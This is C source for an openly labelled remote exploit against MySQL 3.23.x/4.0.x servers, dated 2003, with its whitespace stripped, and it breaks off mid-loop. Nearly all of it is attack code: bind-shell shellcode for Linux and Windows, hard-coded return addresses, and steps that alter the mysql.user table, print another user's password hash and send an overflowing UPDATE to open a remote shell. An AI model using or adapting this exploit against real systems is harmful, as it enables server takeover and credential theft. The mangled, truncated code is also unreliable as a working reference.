/* *expformysql *proofofconcept *usingjmp*eaxonlinux *usingjmp*edxonwindows *bkbll(bkbll_at_cnhonker.net,bkbll_at_tom.com)2003/09/12 *compile:gcc-omysqlmysql.c-L/usr/lib/mysql-lmysqlclient * */ #include #include #include #include #include #include #include #include #include #defineROOTUSER"root" #definePORT3306 #defineMYDB"mysql" #defineALTCOLUMSQL"ALTERTABLEuserCHANGECOLUMNPasswordPasswordLONGTEXT" #defineLISTUSERSQL"SELECTuser,passwordFROMmysql.userWHEREuser!='root'LIMIT0,1" #defineFLUSHSQL"\x11\x00\x00\x00\x03\x66\x6C\x75\x73\x68\x20\x70\x72\x69\x76\x69\x6C\x65\x67\x65\x73" #defineBUF2048 #defineVER"2.1b2" #defineCMD"uname-a;id\n" MYSQL*conn; charNOP[]="90"; charlinux_shellcode[]= "db31c03102b0c931" "c08580cdc3893474" "d231c03180cd07b0" "40b0c03109b180cd" "c031c38980cd25b0" "80c2fe43f07203fa" "14b0c031c38980cd" "c931c03125b009b1" "17b080cdc03180cd" "89504050b0c931e3" "b180cda283c889e0" "d0f70ae831c78940" "894c40c0525050e2" "4c8d5157db310424" "66b00ab3835980cd" "057501f874493a80" "31d2e209c38940c0" "fb8980cd3fb003b1" "4180cd496851f8e2" "68732f6e622f2f68" "51e389696c692d68" "51e28970e1895352" "c031d23180cd0bb0" ; //bindon53port charwin_shellcode[]= /* "4A5A10EBB966C9333480017DFAE2990A" "EBE805EB70FFFFFF99999895A938FDC3" "12999999E91295D9D912348512411291" "ED12A5EA6A9AE1879AB9E7128DD71262" "CECF74AA9AA612C8F36B12623F6AC097" "C6C091EDDC9D5E1AC6C0707B125412C7" "5A9ABDDF589A784812FF50AA85DF1291" "78585A9A12589A9B125A9A991A6E1263" "4912975F71C09AF39999991ECB945F1A" "65CE66CFF34112C3ED71C09CC9999999" "F3C9C9C9669BF398411275CE999B9E5E" "59AAAC99F39DDE1066CACE8998F369CE" "6DCE66CA66CAC9C9491261CE12DD751A" "F359AA6D9D10C08910627B17CF10A1CF" "D9CF10A5B5DF5EFFDE149898AACFC989" "C8C8C850C8C898F3FAA5DE5E1499FDF4" "C8C9A5DECB79CE66CA65CE66C965CE66" "AA7DCE66591C3559CBC860EC4B66CACF" "7B32C0C35A59AA7766677671EDFCDE66" "FAF6EBC9EBFDFDD899EAEAFCF8FCEBDA" "EBC9FCEDEAFCFAF6DC99D8EACDEDF0E1" "F8FCEBF1F6D599FDF0D5FDF8EBF8EBFB" "EE99D8E0AAC6ABEACACE99ABFAF6CAD8" "D8EDFCF2F7F0FB99F0F599FDF7FCEDEA" "FAFAF89999EDE9FCEAF6F5FAFAF6EAFC" "99EDFCF2"; */ "EB909090334A5A107EB966C90A348001" "EBFAE299FFEBE8059570FFFFC3999998" "99A938FDD912999985E9129591D91234" "EA12411287ED12A5126A9AE1629AB9E7" "AA8DD712C8CECF74629AA61297F36B12" "ED3F6AC01AC6C0917BDC9D5EC7C6C070" "DF125412485A9ABDAA589A789112FF50" "9A85DF129B78585A9912589A63125A9A" "5F1A6E12F34912971E71C09A1A999999" "CFCB945FC365CE669CF3411299ED71C0" "C9C9999998F3C9C9CE669BF35E411275" "99999B9E1059AAAC89F39DDECE66CACE" "CA98F369C96DCE66CE66CAC91A491261" "6D12DD7589F359AA179D10C0CF10627B" "A5CF10A1FFD9CF1098B5DF5E89DE1498" "50AACFC9F3C8C8C85EC8C898F4FAA5DE" "DE1499FD66C8C9A566CB79CE66CA65CE" "66C965CE59AA7DCEEC591C35CFCBC860" "C34B66CA777B32C0715A59AA66666776" "C9EDFCDED8FAF6EBFCEBFDFDDA99EAEA" "EDF8FCEBF6EBC9FCEAEAFCFAE1DC99D8" "EBC9EDF0EAFCFAF6F6D599EAF0D5FDF8" "EBF8EBFBEE99D8E0AAC6ABEACACE99AB" "FAF6CAD8D8EDFCF2F7F0FB99F0F599FD" "F7FCEDEAFAFAF89999EDE9FCEAF6F5FA" "FAF6EAFC99EDFCF29090909090909090" ; intwin_port=53; inttype=1; struct { char*os; u_longret; intpad; intsystemtype;//0islinux,1iswindows }targets[]= { {"linux:glibc-2.2.93-5",0x42125b2b,19*4*2,0}, {"windows2000SP3CN",0x77e625db,9*4*2,1}, },v; voidusage(char*); voidsqlerror(char*); MYSQL*mysqlconn(char*server,intport,char*user,char*pass,char*dbname); main(intargc,char**argv) { MYSQL_RES*result; MYSQL_ROWrow; charjmpaddress[8]; charbuffer[BUF],muser[20],buf2[1200]; my_ulonglongrslines; structsockaddr_inclisocket; inti=0,j,clifd,count,a; chardata1,c; fd_setfds; char*server=NULL,*rootpass=NULL; intpad,systemtype; u_longjmpaddr; if(argc<3)usage(argv[0]); while((c=getopt(argc,argv,"d:t:p:"))!=EOF) { switch(c) { case'd': server=optarg; break; case't': type=atoi(optarg); if((type>sizeof(targets)/sizeof(v))||(type<1)) usage(argv[0]); break; case'p': rootpass=optarg; break; default: usage(argv[0]); return1; } } if(server==NULL||rootpass==NULL) usage(argv[0]); memset(muser,0,20); memset(buf2,0,1200); pad=targets[type-1].pad; systemtype=targets[type-1].systemtype; jmpaddr=targets[type-1].ret; printf("@-------------------------------------------------@\n"); printf("#Mysql3.23.x/4.0.xremoteexploit(09/13)-%s#\n",VER); printf("@bybkbll(bkbll_at_cnhonker.net,bkbll_at_tom.com@\n"); printf("---------------------------------------------------\n"); printf("[+]systemtype:%s,usingretaddr:%p,pad:%d\n",(systemtype==0)?"linux":"windows",jmpaddr,pad); printf("[+]Connectingtomysqlserver%s:%d....",server,PORT); fflush(stdout); conn=mysqlconn(server,PORT,ROOTUSER,rootpass,MYDB); if(conn==NULL)exit(0); printf("ok\n"); printf("[+]ALTERusercolumn..."); fflush(stdout); if(mysql_real_query(conn,ALTCOLUMSQL,strlen(ALTCOLUMSQL))!=0) sqlerror("ALTERusertablefailed"); //select printf("ok\n"); printf("[+]Selectavaliduser..."); fflush(stdout); if(mysql_real_query(conn,LISTUSERSQL,strlen(LISTUSERSQL))!=0) sqlerror("selectuserfromtablefailed"); result=mysql_store_result(conn); if(result==NULL) sqlerror("storeresulterror"); rslines=mysql_num_rows(result); if(rslines==0) sqlerror("Cannotfindauser"); row=mysql_fetch_row(result); snprintf(muser,19,"%s",row[0]); printf("ok\n"); printf("[+]Foundauser:%s,password:%s\n",muser,row[1]); memset(buffer,0,BUF); i=sprintf(buffer,"updateusersetpassword='"); sprintf(jmpaddress,"%x",jmpaddr); jmpaddress[8]=0; for(j=0;j